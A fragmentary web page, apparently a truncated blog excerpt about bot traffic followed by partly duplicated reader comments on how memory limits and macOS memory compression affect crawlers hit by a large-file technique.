The majority of the traffic on the web is from bots. For the most part, these bots are used to discover new content. These are RSS Feed readers, search engines crawling your content, or nowadays AI bo
No, but that’s an interesting question. Ultimately it probably comes down to hardware specs. Or depending on the particular bot and it’s env the spec of the container it’s running in
Even with macos’s style of compressing inactive memory pages you’ll still have a hard cap that can be reached with the same technique (just with a larger uncompressed file)
No, but that’s an interesting question. Ultimately it probably comes down to hardware specs. Or depending on the particular bot and it’s env the spec of the container it’s running in
Even with macos’s style of compressing inactive memory pages you’ll still have a hard cap that can be reached with the same technique (just with a larger uncompressed file)
How long would it take to be considered an inactive memory page? Does OOM conditions immediately trigger compression, or would the process die first?